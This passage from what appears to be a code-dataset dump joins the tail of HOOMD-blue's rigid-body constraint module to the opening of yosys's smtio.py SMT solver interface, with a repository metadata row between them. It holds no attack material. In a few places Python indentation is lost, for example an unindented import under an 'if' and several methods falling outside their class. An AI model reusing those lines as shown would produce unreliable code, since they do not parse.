    these forces and torques to integrate the equations of motion of the central
    particles (representing the whole rigid body) forward in time.
    .. rubric:: Defining bodies
    `Rigid` accepts one local body definition per body type. The
    type of a body is the particle type of the central particle in that body.
    In this way, each particle of type *R* in the system configuration defines
    a body of type *R*.
    As a convenience, you do not need to create placeholder entries for all of
    the constituent particles in your initial configuration. You only need to
    specify the positions and orientations of all the central particles. When
    you call `create_bodies`, it will create all constituent particles.
    Warning:
        Automatic creation of constituent particles changes particle tags. When
        there are bonds between particles in the initial configuration, or bonds
        connect to constituent particles, include the constituent particles in
        the initial configuration manually.
    When you create the constituent particles manually (i.e. in an input file
    or with snapshots), the central particle of a rigid body must have a lower
    tag than all of its constituent particles. Constituent particles follow in
    monotonically increasing tag order, corresponding to the order they were
    defined in the argument to `Rigid` initialization. The order of central and
    contiguous particles need **not** to be contiguous. Additionally, you must
    set the ``body`` field for each of the particles in the rigid body to the
    tag of the central particle (for both the central and constituent
    particles). Set ``body`` to -1 for particles that do not belong to a rigid
    body (i.e. free bodies).
    .. rubric:: Integrating bodies
    Most integrators in HOOMD support the integration of rotational degrees of
    freedom. When there are rigid bodies present in the system, do not apply
    integrators to the constituent particles, only the central and non-rigid
    particles.
    Example::
        rigid_centers_and_free_filter = hoomd.filter.Rigid(
            ("center", "free"))
        langevin = hoomd.md.methods.Langevin(
            filter=rigid_centers_and_free_filter, kT=1.0)
    .. rubric:: Thermodynamic quantities of bodies
    HOOMD computes thermodynamic quantities (temperature, kinetic energy,
    etc.) appropriately when there are rigid bodies present in the system.
    When it does so, it ignores all constituent particles and computes the
    translational and rotational energies of the central particles, which
    represent the whole body.
    .. rubric:: Restarting simulations with rigid bodies.
    To restart, use `hoomd.write.GSD` to write restart files. GSD
    stores all of the particle data fields needed to reconstruct the state of
    the system, including the body tag, rotational momentum, and orientation of
    the body. Restarting from a gsd file is equivalent to manual constituent
    particle creation. You still need to specify the same local body space
    environment to `Rigid` as you did in the earlier simulation.
    To set constituent particle types and coordinates for a rigid body use the
    `body` attribute.
    .. py:attribute:: body
        body is a mapping from the central particle type to a body definition
        represented as a dictionary. The mapping respects ``None`` as meaning
        that the type is not a rigid body center. All types are set to ``None``
        by default. The keys for the body definition are
        - ``constituent_types`` (list[str]): List of types of constituent
          particles
        - ``positions`` (list[tuple[float, float, float]]): List of relative
          positions of constituent particles
        - ``orientations`` (list[tuple[float, float, float, float]]): List of
          orientations (as quaternions) of constituent particles
        - ``charge`` (list[float]): List of charges of constituent particles
        - ``diameters`` (list[float]): List of diameters of constituent
          particles
        Type: `TypeParameter` [``particle_type``, `dict`]
    .. caution::
        The constituent particle type must exist.
    Example::
        rigid = constrain.Rigid()
        rigid.body['A'] = {
            "constituent_types": ['A_const', 'A_const'],
            "positions": [(0,0,1),(0,0,-1)],
            "orientations": [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)],
            "charges": [0.0, 0.0],
            "diameters": [1.0, 1.0]
            }
        rigid.body['B'] = {
            "constituent_types": ['B_const', 'B_const'],
            "positions": [(0,0,.5),(0,0,-.5)],
            "orientations": [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)],
            "charges": [0.0, 1.0],
            "diameters": [1.5, 1.0]
            }
        # Can set rigid body definition to be None explicitly.
        rigid.body["A"] = None
    Warning:
        `Rigid` will significantly slow down a simulation when
        frequently changing rigid body definitions or adding/removing particles
        from the simulation.
    """
    # C++ backend class name; Constraint._attach resolves CPU/GPU variants.
    _cpp_class_name = "ForceComposite"
    def __init__(self):
        # Per-particle-type body definition; None (the default) marks
        # types that are not rigid body centers.
        body = TypeParameter(
            "body", "particle_types",
            TypeParameterDict(OnlyIf(to_type_converter({
                'constituent_types': [str],
                'positions': [(float,) * 3],
                'orientations': [(float,) * 4],
                'charges': [float],
                'diameters': [float]
            }),
                allow_none=True),
                len_keys=1))
        self._add_typeparam(body)
        self.body.default = None
    def create_bodies(self, state):
        R"""Create rigid bodies from central particles in state.
        Args:
            state (hoomd.State): The state in which to create rigid bodies.
        This method will remove any existing constituent particles (defined as
        having a valid body flag without a central particle definition in the
        rigid `body` attribute).
        Note:
            This method will change any existing body tags.
        Tip:
            If planning on using this function, initialize the `hoomd.State`
            with free and central particles without worrying about the body
            tag. Existing body values or constituent particles in the state
            won't cause errors, but the method does not need it.
        Warning:
            This method must be called before its associated simulation is run.
        """
        if self._attached:
            raise RuntimeError(
                "Cannot call create_bodies after running simulation.")
        # Attach and store information for detaching after calling
        # createRigidBodies
        old_sim = None
        if self._added:
            old_sim = self._simulation
        self._add(state._simulation)
        super()._attach()
        self._cpp_obj.createRigidBodies()
        # Restore previous state: detach from the temporary simulation and
        # either re-bind the old one or remove ourselves entirely.
        self._detach()
        if old_sim is not None:
            self._simulation = old_sim
        else:
            self._remove()
    def _attach(self):
        """Attach and validate rigid body data on the C++ side."""
        super()._attach()
        # Need to ensure body tags and molecule sizes are correct and that the
        # positions and orientations are accurate before integration.
        self._cpp_obj.validateRigidBodies()
        self._cpp_obj.updateCompositeParticles(0)
|
joaander/hoomd-blue
|
hoomd/md/constrain.py
|
Python
|
bsd-3-clause
| 12,667
|
[
"HOOMD-blue"
] |
c08c144a2d76c150769e88b9175a579ec020da528112374c035f90e452b73c7f
|
#
# yosys -- Yosys Open SYnthesis Suite
#
# Copyright (C) 2012 Clifford Wolf <clifford@clifford.at>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import sys, re, os, signal
import subprocess
if os.name == "posix":
import resource
from copy import deepcopy
from select import select
from time import time
from queue import Queue, Empty
from threading import Thread
# This is needed so that the recursive SMT2 S-expression parser
# does not run out of stack frames when parsing large expressions
if os.name == "posix":
    smtio_reclimit = 64 * 1024
    if sys.getrecursionlimit() < smtio_reclimit:
        sys.setrecursionlimit(smtio_reclimit)
    # Raising the Python recursion limit is useless if the OS stack is
    # too small; try to grow the soft RLIMIT_STACK as well.
    current_rlimit_stack = resource.getrlimit(resource.RLIMIT_STACK)
    if current_rlimit_stack[0] != resource.RLIM_INFINITY:
        smtio_stacksize = 128 * 1024 * 1024
        if os.uname().sysname == "Darwin":
            # MacOS has rather conservative stack limits
            smtio_stacksize = 8 * 1024 * 1024
        if current_rlimit_stack[1] != resource.RLIM_INFINITY:
            # soft limit may not exceed the hard limit
            smtio_stacksize = min(smtio_stacksize, current_rlimit_stack[1])
        if current_rlimit_stack[0] < smtio_stacksize:
            try:
                resource.setrlimit(resource.RLIMIT_STACK, (smtio_stacksize, current_rlimit_stack[1]))
            except ValueError:
                # couldn't get more stack, just run with what we have
                pass
# currently running solvers (so we can kill them)
running_solvers = dict()
# set once by force_shutdown() so cleanup only happens a single time
forced_shutdown = False
# monotonically increasing key for entries in running_solvers
solvers_index = 0
def force_shutdown(signum, frame):
    """Terminate all running solver processes exactly once, then exit.

    Installed both as a signal handler and called from the excepthook;
    signum is None for non-signal invocations.
    """
    global forced_shutdown
    if not forced_shutdown:
        forced_shutdown = True
        if signum is not None:
            # announce which signal triggered the shutdown
            print("<%s>" % signal.Signals(signum).name)
        for p in running_solvers.values():
            # os.killpg(os.getpgid(p.pid), signal.SIGTERM)
            os.kill(p.pid, signal.SIGTERM)
    sys.exit(1)
# Route fatal signals through force_shutdown so child solvers die with us.
if os.name == "posix":
    signal.signal(signal.SIGHUP, force_shutdown)
signal.signal(signal.SIGINT, force_shutdown)
signal.signal(signal.SIGTERM, force_shutdown)
def except_hook(exctype, value, traceback):
    """Print the traceback (unless already shutting down), then shut down."""
    if not forced_shutdown:
        sys.__excepthook__(exctype, value, traceback)
    force_shutdown(None, None)
sys.excepthook = except_hook
# Map a single hex digit (either case) to its 4-bit binary string —
# presumably used later in the file to expand #x... bit-vector
# constants into per-bit values.
hex_dict = {
    "0": "0000", "1": "0001", "2": "0010", "3": "0011",
    "4": "0100", "5": "0101", "6": "0110", "7": "0111",
    "8": "1000", "9": "1001", "A": "1010", "B": "1011",
    "C": "1100", "D": "1101", "E": "1110", "F": "1111",
    "a": "1010", "b": "1011", "c": "1100", "d": "1101",
    "e": "1110", "f": "1111"
}
class SmtModInfo:
    """Per-module metadata collected from a yosys-generated SMT2 file.

    Holds the ports, registers, wires, memories, clocks, sub-cells and
    property (assert/cover) information for one HDL module.
    """
    def __init__(self):
        # port and signal name sets
        self.inputs = set()
        self.outputs = set()
        self.registers = set()
        self.wires = set()
        # lookup tables keyed by signal / cell / property identifier
        self.memories = dict()
        self.wsize = dict()
        self.clocks = dict()
        self.cells = dict()
        self.asserts = dict()
        self.covers = dict()
        self.anyconsts = dict()
        self.anyseqs = dict()
        self.allconsts = dict()
        self.allseqs = dict()
        self.asize = dict()
        # optimization objectives
        self.maximize = set()
        self.minimize = set()
class SmtIo:
    def __init__(self, opts=None):
        """Configure (but do not start) an SMT solver session.

        Args:
            opts: optional options object; only its attributes are read.
                When None, defaults to incremental yices with debugging
                and unrolling disabled.
        """
        global solvers_index
        self.logic = None      # None: derived from the logic_* flags in setup()
        self.logic_qf = True   # quantifier-free ("QF_" prefix)
        self.logic_ax = True   # arrays theory ("A")
        self.logic_uf = True   # uninterpreted functions ("UF")
        self.logic_bv = True   # bit-vectors ("BV")
        self.logic_dt = False  # datatypes (forces logic "ALL")
        self.forall = False
        self.timeout = 0
        self.produce_models = True
        # replayable statement cache, one list per (push)-level (noincr mode)
        self.smt2cache = [list()]
        self.smt2_options = dict()
        self.p = None          # solver subprocess, created by p_open()
        # unique key into the module-level running_solvers registry
        self.p_index = solvers_index
        solvers_index += 1
        if opts is not None:
            self.logic = opts.logic
            self.solver = opts.solver
            self.solver_opts = opts.solver_opts
            self.debug_print = opts.debug_print
            self.debug_file = opts.debug_file
            self.dummy_file = opts.dummy_file
            self.timeinfo = opts.timeinfo
            self.timeout = opts.timeout
            self.unroll = opts.unroll
            self.noincr = opts.noincr
            self.info_stmts = opts.info_stmts
            self.nocomments = opts.nocomments
        else:
            self.solver = "yices"
            self.solver_opts = list()
            self.debug_print = False
            self.debug_file = None
            self.dummy_file = None
            self.timeinfo = os.name != "nt"
            self.timeout = 0
            self.unroll = False
            self.noincr = False
            self.info_stmts = list()
            self.nocomments = False
        self.start_time = time()
        # per-module metadata (SmtModInfo instances)
        self.modinfo = dict()
        self.curmod = None
        self.topmod = None
        self.setup_done = False
    def __del__(self):
        # On garbage collection, kill the solver's whole process group
        # (unless a global shutdown already terminated everything) and
        # drop it from the running_solvers registry.
        if self.p is not None and not forced_shutdown:
            os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)
            if running_solvers is not None:
                del running_solvers[self.p_index]
    def setup(self):
        """Finalize configuration: build the solver command line, start
        the solver process (unless noincr), derive the SMT-LIB logic
        string, and emit the SMT2 prelude (options, logic, cached info
        statements). Runs exactly once, triggered by the first write().
        """
        assert not self.setup_done
        if self.forall:
            # exists-forall mode is incompatible with the unroll front-end
            self.unroll = False
        if self.solver == "yices":
            if self.noincr or self.forall:
                self.popen_vargs = ['yices-smt2'] + self.solver_opts
            else:
                self.popen_vargs = ['yices-smt2', '--incremental'] + self.solver_opts
            if self.timeout != 0:
                self.popen_vargs.append('-t')
                self.popen_vargs.append('%d' % self.timeout);
        if self.solver == "z3":
            self.popen_vargs = ['z3', '-smt2', '-in'] + self.solver_opts
            if self.timeout != 0:
                self.popen_vargs.append('-T:%d' % self.timeout);
        if self.solver == "cvc4":
            if self.noincr:
                self.popen_vargs = ['cvc4', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
            else:
                self.popen_vargs = ['cvc4', '--incremental', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
            if self.timeout != 0:
                # cvc4 takes its time limit in milliseconds
                self.popen_vargs.append('--tlimit=%d000' % self.timeout);
        if self.solver == "mathsat":
            self.popen_vargs = ['mathsat'] + self.solver_opts
            if self.timeout != 0:
                print('timeout option is not supported for mathsat.')
                sys.exit(1)
        if self.solver == "boolector":
            if self.noincr:
                self.popen_vargs = ['boolector', '--smt2'] + self.solver_opts
            else:
                self.popen_vargs = ['boolector', '--smt2', '-i'] + self.solver_opts
            # boolector always goes through the unroll front-end (which
            # also drops UF from the logic string below)
            self.unroll = True
            if self.timeout != 0:
                print('timeout option is not supported for boolector.')
                sys.exit(1)
        if self.solver == "abc":
            if len(self.solver_opts) > 0:
                self.popen_vargs = ['yosys-abc', '-S', '; '.join(self.solver_opts)]
            else:
                self.popen_vargs = ['yosys-abc', '-S', '%blast; &sweep -C 5000; &syn4; &cec -s -m -C 2000']
            self.logic_ax = False
            self.unroll = True
            self.noincr = True
            if self.timeout != 0:
                print('timeout option is not supported for abc.')
                sys.exit(1)
        if self.solver == "dummy":
            # "dummy" replays a previously recorded solver transcript
            assert self.dummy_file is not None
            self.dummy_fd = open(self.dummy_file, "r")
        else:
            if self.dummy_file is not None:
                # record the interaction for a later "dummy" replay
                self.dummy_fd = open(self.dummy_file, "w")
            if not self.noincr:
                self.p_open()
        if self.unroll:
            assert not self.forall
            self.logic_uf = False
            self.unroll_idcnt = 0
            self.unroll_buffer = ""
            self.unroll_sorts = set()
            self.unroll_objs = set()
            self.unroll_decls = dict()
            self.unroll_cache = dict()
            self.unroll_stack = list()
        if self.logic is None:
            # derive the SMT-LIB logic name from the enabled theories
            self.logic = ""
            if self.logic_qf: self.logic += "QF_"
            if self.logic_ax: self.logic += "A"
            if self.logic_uf: self.logic += "UF"
            if self.logic_bv: self.logic += "BV"
            if self.logic_dt: self.logic = "ALL"
            if self.solver == "yices" and self.forall: self.logic = "BV"
        self.setup_done = True
        for stmt in self.info_stmts:
            self.write(stmt)
        if self.produce_models:
            self.write("(set-option :produce-models true)")
        #See the SMT-LIB Standard, Section 4.1.7
        modestart_options = [":global-declarations", ":interactive-mode", ":produce-assertions", ":produce-assignments", ":produce-models", ":produce-proofs", ":produce-unsat-assumptions", ":produce-unsat-cores", ":random-seed"]
        for key, val in self.smt2_options.items():
            # these options must be set before (set-logic ...)
            if key in modestart_options:
                self.write("(set-option {} {})".format(key, val))
        self.write("(set-logic %s)" % self.logic)
        if self.forall and self.solver == "yices":
            self.write("(set-option :yices-ef-max-iters 1000000000)")
        for key, val in self.smt2_options.items():
            if key not in modestart_options:
                self.write("(set-option {} {})".format(key, val))
def timestamp(self):
secs = int(time() - self.start_time)
return "## %3d:%02d:%02d " % (secs // (60*60), (secs // 60) % 60, secs % 60)
def replace_in_stmt(self, stmt, pat, repl):
if stmt == pat:
return repl
if isinstance(stmt, list):
return [self.replace_in_stmt(s, pat, repl) for s in stmt]
return stmt
    def unroll_stmt(self, stmt):
        """Rewrite applications of functions over uninterpreted sorts
        into fresh |UNROLL#n| constants, emitting any needed
        declarations as a side effect. Used for solvers that run with
        the unroll front-end (see setup())."""
        if not isinstance(stmt, list):
            return stmt
        # rewrite sub-expressions first (bottom-up)
        stmt = [self.unroll_stmt(s) for s in stmt]
        if len(stmt) >= 2 and not isinstance(stmt[0], list) and stmt[0] in self.unroll_decls:
            assert stmt[1] in self.unroll_objs
            # one fresh symbol per unique application (function, args...)
            key = tuple(stmt)
            if key not in self.unroll_cache:
                decl = deepcopy(self.unroll_decls[key[0]])
                self.unroll_cache[key] = "|UNROLL#%d|" % self.unroll_idcnt
                decl[1] = self.unroll_cache[key]
                self.unroll_idcnt += 1
                if decl[0] == "declare-fun":
                    if isinstance(decl[3], list) or decl[3] not in self.unroll_sorts:
                        # result sort is interpreted: declare a 0-ary constant
                        self.unroll_objs.add(decl[1])
                        decl[2] = list()
                    else:
                        # result sort is uninterpreted: track it, emit nothing
                        self.unroll_objs.add(decl[1])
                        decl = list()
                elif decl[0] == "define-fun":
                    # substitute actual arguments into the body, then turn
                    # the definition into a 0-ary one
                    arg_index = 1
                    for arg_name, arg_sort in decl[2]:
                        decl[4] = self.replace_in_stmt(decl[4], arg_name, key[arg_index])
                        arg_index += 1
                    decl[2] = list()
                if len(decl) > 0:
                    # the new declaration may itself need unrolling
                    decl = self.unroll_stmt(decl)
                    self.write(self.unparse(decl), unroll=False)
            return self.unroll_cache[key]
        return stmt
    def p_thread_main(self):
        # Reader thread: forward solver stdout lines into p_queue; an
        # empty string marks end-of-stream and clears p_running.
        while True:
            data = self.p.stdout.readline().decode("ascii")
            if data == "": break
            self.p_queue.put(data)
        self.p_queue.put("")
        self.p_running = False
    def p_open(self):
        """Launch the solver subprocess and its stdout reader thread,
        and register it in the global running_solvers table."""
        assert self.p is None
        try:
            self.p = subprocess.Popen(self.popen_vargs, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        except FileNotFoundError:
            print("%s SMT Solver '%s' not found in path." % (self.timestamp(), self.popen_vargs[0]), flush=True)
            sys.exit(1)
        running_solvers[self.p_index] = self.p
        self.p_running = True
        self.p_next = None   # one-line lookahead buffer used by p_poll()
        self.p_queue = Queue()
        self.p_thread = Thread(target=self.p_thread_main)
        self.p_thread.start()
    def p_write(self, data, flush):
        # Send raw text to the solver's stdin; flush when requested so
        # the solver sees a complete command immediately.
        assert self.p is not None
        self.p.stdin.write(bytes(data, "ascii"))
        if flush: self.p.stdin.flush()
    def p_read(self):
        """Return the next line of solver output ("" once it exited)."""
        assert self.p is not None
        if self.p_next is not None:
            # consume the line pre-fetched by p_poll() first
            data = self.p_next
            self.p_next = None
            return data
        if not self.p_running:
            return ""
        return self.p_queue.get()
    def p_poll(self, timeout=0.1):
        """Wait up to `timeout` seconds for solver output.

        Returns True on timeout (nothing available yet); False when a
        line is ready (stashed in self.p_next for the next p_read()).
        """
        assert self.p is not None
        assert self.p_running
        if self.p_next is not None:
            return False
        try:
            self.p_next = self.p_queue.get(True, timeout)
            return False
        except Empty:
            return True
def p_close(self):
    # Shut down the solver: closing stdin makes the solver exit, which
    # ends the reader thread (EOF on stdout).  Then clear all process
    # state so p_open() can be called again.
    assert self.p is not None
    self.p.stdin.close()
    self.p_thread.join()
    assert not self.p_running
    del running_solvers[self.p_index]
    self.p = None
    self.p_next = None
    self.p_queue = None
    self.p_thread = None
def write(self, stmt, unroll=True):
    # Send one SMT2 statement to the solver (or cache it in noincr
    # mode).  Handles comment routing, lazy setup, and optional
    # elimination ("unrolling") of uninterpreted sorts/functions.
    if stmt.startswith(";"):
        # Comment line: route backend metadata to info(); before setup
        # the comments are also queued so setup() can replay them.
        self.info(stmt)
        if not self.setup_done:
            self.info_stmts.append(stmt)
            return
    elif not self.setup_done:
        self.setup()
    stmt = stmt.strip()
    if self.nocomments or self.unroll:
        stmt = re.sub(r" *;.*", "", stmt)
        if stmt == "": return
    if unroll and self.unroll:
        # Accumulate input until the parentheses balance; |quoted|
        # symbols are masked out first so their contents don't skew
        # the bracket count.
        stmt = self.unroll_buffer + stmt
        self.unroll_buffer = ""
        s = re.sub(r"\|[^|]*\|", "", stmt)
        if s.count("(") != s.count(")"):
            self.unroll_buffer = stmt + " "
            return
        s = self.parse(stmt)
        if self.debug_print:
            print("-> %s" % s)
        if len(s) == 3 and s[0] == "declare-sort" and s[2] == "0":
            # Uninterpreted sort: eliminated by unrolling.
            self.unroll_sorts.add(s[1])
            return
        elif len(s) == 4 and s[0] == "declare-fun" and s[2] == [] and s[3] in self.unroll_sorts:
            # Zero-argument constant of an uninterpreted sort.
            self.unroll_objs.add(s[1])
            return
        elif len(s) >= 4 and s[0] == "declare-fun":
            # Function taking an uninterpreted-sort argument: defer the
            # declaration; unroll_stmt() expands it per call site.
            for arg_sort in s[2]:
                if arg_sort in self.unroll_sorts:
                    self.unroll_decls[s[1]] = s
                    return
        elif len(s) >= 4 and s[0] == "define-fun":
            for arg_name, arg_sort in s[2]:
                if arg_sort in self.unroll_sorts:
                    self.unroll_decls[s[1]] = s
                    return
        stmt = self.unparse(self.unroll_stmt(s))
        if stmt == "(push 1)":
            # Snapshot unroll state so a later (pop 1) can restore it.
            self.unroll_stack.append((
                deepcopy(self.unroll_sorts),
                deepcopy(self.unroll_objs),
                deepcopy(self.unroll_decls),
                deepcopy(self.unroll_cache),
            ))
        if stmt == "(pop 1)":
            self.unroll_sorts, self.unroll_objs, self.unroll_decls, self.unroll_cache = self.unroll_stack.pop()
    if self.debug_print:
        print("> %s" % stmt)
    if self.debug_file:
        print(stmt, file=self.debug_file)
        self.debug_file.flush()
    if self.solver != "dummy":
        if self.noincr:
            # Non-incremental mode: keep a statement cache instead of
            # relying on solver push/pop; check_sat() restarts the
            # solver and replays the cache.
            if self.p is not None and not stmt.startswith("(get-"):
                self.p_close()
            if stmt == "(push 1)":
                self.smt2cache.append(list())
            elif stmt == "(pop 1)":
                self.smt2cache.pop()
            else:
                if self.p is not None:
                    self.p_write(stmt + "\n", True)
                self.smt2cache[-1].append(stmt)
        else:
            self.p_write(stmt + "\n", True)
def info(self, stmt):
    # Parse one "; yosys-smt2-*" metadata comment emitted by the yosys
    # smt2 backend and record it on self / the current SmtModInfo.
    if not stmt.startswith("; yosys-smt2-"):
        return
    fields = stmt.split()
    if fields[1] == "yosys-smt2-solver-option":
        self.smt2_options[fields[2]] = fields[3]
    if fields[1] == "yosys-smt2-nomem":
        # No memories in the design -> array theory not needed.
        if self.logic is None:
            self.logic_ax = False
    if fields[1] == "yosys-smt2-nobv":
        # No bit-vector state -> BV theory not needed.
        if self.logic is None:
            self.logic_bv = False
    if fields[1] == "yosys-smt2-stdt":
        # State is encoded using SMT datatypes.
        if self.logic is None:
            self.logic_dt = True
    if fields[1] == "yosys-smt2-forall":
        # Design uses quantifiers; drop the QF_ logic prefix.
        if self.logic is None:
            self.logic_qf = False
        self.forall = True
    if fields[1] == "yosys-smt2-module":
        # Start of a new module section; following lines refer to it.
        self.curmod = fields[2]
        self.modinfo[self.curmod] = SmtModInfo()
    if fields[1] == "yosys-smt2-cell":
        self.modinfo[self.curmod].cells[fields[3]] = fields[2]
    if fields[1] == "yosys-smt2-topmod":
        self.topmod = fields[2]
    if fields[1] == "yosys-smt2-input":
        self.modinfo[self.curmod].inputs.add(fields[2])
        self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
    if fields[1] == "yosys-smt2-output":
        self.modinfo[self.curmod].outputs.add(fields[2])
        self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
    if fields[1] == "yosys-smt2-register":
        self.modinfo[self.curmod].registers.add(fields[2])
        self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
    if fields[1] == "yosys-smt2-memory":
        self.modinfo[self.curmod].memories[fields[2]] = (int(fields[3]), int(fields[4]), int(fields[5]), int(fields[6]), fields[7] == "async")
    if fields[1] == "yosys-smt2-wire":
        self.modinfo[self.curmod].wires.add(fields[2])
        self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
    if fields[1] == "yosys-smt2-clock":
        # A signal seen with both posedge and negedge collapses to the
        # generic "event" edge type.
        for edge in fields[3:]:
            if fields[2] not in self.modinfo[self.curmod].clocks:
                self.modinfo[self.curmod].clocks[fields[2]] = edge
            elif self.modinfo[self.curmod].clocks[fields[2]] != edge:
                self.modinfo[self.curmod].clocks[fields[2]] = "event"
    if fields[1] == "yosys-smt2-assert":
        self.modinfo[self.curmod].asserts["%s_a %s" % (self.curmod, fields[2])] = fields[3]
    if fields[1] == "yosys-smt2-cover":
        self.modinfo[self.curmod].covers["%s_c %s" % (self.curmod, fields[2])] = fields[3]
    if fields[1] == "yosys-smt2-maximize":
        self.modinfo[self.curmod].maximize.add(fields[2])
    if fields[1] == "yosys-smt2-minimize":
        self.modinfo[self.curmod].minimize.add(fields[2])
    if fields[1] == "yosys-smt2-anyconst":
        # fields[3] is the bit width; fields[4]/[5] are stored verbatim
        # (presumably SMT name and source location -- TODO confirm).
        self.modinfo[self.curmod].anyconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
        self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
    if fields[1] == "yosys-smt2-anyseq":
        self.modinfo[self.curmod].anyseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
        self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
    if fields[1] == "yosys-smt2-allconst":
        self.modinfo[self.curmod].allconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
        self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
    if fields[1] == "yosys-smt2-allseq":
        self.modinfo[self.curmod].allseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
        self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
def hiernets(self, top, regs_only=False):
    """Return the hierarchical paths of all nets below module *top*.

    Each path is a list of cell names ending with the net name.  With
    regs_only=True only registers are listed.
    """
    found = []

    def visit(mod, prefix):
        info = self.modinfo[mod]
        for netname in sorted(info.wsize):
            if not regs_only or netname in info.registers:
                found.append(prefix + [netname])
        for cellname, celltype in sorted(info.cells.items()):
            visit(celltype, prefix + [cellname])

    visit(top, [])
    return found
def hieranyconsts(self, top):
    """Collect all anyconst entries below *top*.

    Returns (path, name, value[0], value[1], width) tuples, where the
    value pair is stored verbatim as recorded by info().
    """
    found = []

    def visit(mod, prefix):
        info = self.modinfo[mod]
        for name, value in sorted(info.anyconsts.items()):
            found.append((prefix, name, value[0], value[1], info.asize[name]))
        for cellname, celltype in sorted(info.cells.items()):
            visit(celltype, prefix + [cellname])

    visit(top, [])
    return found
def hieranyseqs(self, top):
    """Collect all anyseq entries below *top*.

    Returns (path, name, value[0], value[1], width) tuples, where the
    value pair is stored verbatim as recorded by info().
    """
    found = []

    def visit(mod, prefix):
        info = self.modinfo[mod]
        for name, value in sorted(info.anyseqs.items()):
            found.append((prefix, name, value[0], value[1], info.asize[name]))
        for cellname, celltype in sorted(info.cells.items()):
            visit(celltype, prefix + [cellname])

    visit(top, [])
    return found
def hierallconsts(self, top):
    """Collect all allconst entries below *top*.

    Returns (path, name, value[0], value[1], width) tuples, where the
    value pair is stored verbatim as recorded by info().
    """
    found = []

    def visit(mod, prefix):
        info = self.modinfo[mod]
        for name, value in sorted(info.allconsts.items()):
            found.append((prefix, name, value[0], value[1], info.asize[name]))
        for cellname, celltype in sorted(info.cells.items()):
            visit(celltype, prefix + [cellname])

    visit(top, [])
    return found
def hierallseqs(self, top):
    """Collect all allseq entries below *top*.

    Returns (path, name, value[0], value[1], width) tuples, where the
    value pair is stored verbatim as recorded by info().
    """
    found = []

    def visit(mod, prefix):
        info = self.modinfo[mod]
        for name, value in sorted(info.allseqs.items()):
            found.append((prefix, name, value[0], value[1], info.asize[name]))
        for cellname, celltype in sorted(info.cells.items()):
            visit(celltype, prefix + [cellname])

    visit(top, [])
    return found
def hiermems(self, top):
    """Return the hierarchical paths of all memories below module *top*."""
    found = []

    def visit(mod, prefix):
        info = self.modinfo[mod]
        for memname in sorted(info.memories):
            found.append(prefix + [memname])
        for cellname, celltype in sorted(info.cells.items()):
            visit(celltype, prefix + [cellname])

    visit(top, [])
    return found
def read(self):
    # Read one complete response from the solver, joining lines until
    # the parentheses balance.
    stmt = []
    count_brackets = 0
    while True:
        if self.solver == "dummy":
            line = self.dummy_fd.readline().strip()
        else:
            line = self.p_read().strip()
            if self.dummy_file is not None:
                # Record solver output for later "dummy" replay runs.
                self.dummy_fd.write(line + "\n")
        count_brackets += line.count("(")
        count_brackets -= line.count(")")
        stmt.append(line)
        if self.debug_print:
            print("< %s" % line)
        if count_brackets == 0:
            break
        if self.solver != "dummy" and self.p.poll():
            # NOTE(review): Popen.poll() returns the exit code, so a
            # solver that exits with status 0 is not detected here --
            # confirm this is intended.
            print("%s Solver terminated unexpectedly: %s" % (self.timestamp(), "".join(stmt)), flush=True)
            sys.exit(1)
    stmt = "".join(stmt)
    if stmt.startswith("(error"):
        print("%s Solver Error: %s" % (self.timestamp(), stmt), flush=True)
        if self.solver != "dummy":
            self.p_close()
        sys.exit(1)
    return stmt
def check_sat(self, expected=["sat", "unsat", "unknown", "timeout", "interrupted"]):
    # Issue (check-sat), wait for the verdict, and return it.
    # (The mutable default *expected* list is only read, never changed.)
    if self.debug_print:
        print("> (check-sat)")
    if self.debug_file and not self.nocomments:
        print("; running check-sat..", file=self.debug_file)
        self.debug_file.flush()
    if self.solver != "dummy":
        if self.noincr:
            # Non-incremental mode: restart the solver and replay the
            # cached statement history instead of using push/pop.
            if self.p is not None:
                self.p_close()
            self.p_open()
            for cache_ctx in self.smt2cache:
                for cache_stmt in cache_ctx:
                    self.p_write(cache_stmt + "\n", False)
        self.p_write("(check-sat)\n", True)
        if self.timeinfo:
            # Interactive spinner + elapsed-time display on stderr while
            # the solver is silent (polled in ~0.1 s steps).
            i = 0
            s = "/-\|"
            count = 0
            num_bs = 0  # number of backspaces needed to erase the display
            while self.p_poll():
                count += 1
                if count < 25:
                    continue  # stay quiet for the first ~2.5 seconds
                if count % 10 == 0 or count == 25:
                    secs = count // 10
                    if secs < 60:
                        m = "(%d seconds)" % secs
                    elif secs < 60*60:
                        m = "(%d seconds -- %d:%02d)" % (secs, secs // 60, secs % 60)
                    else:
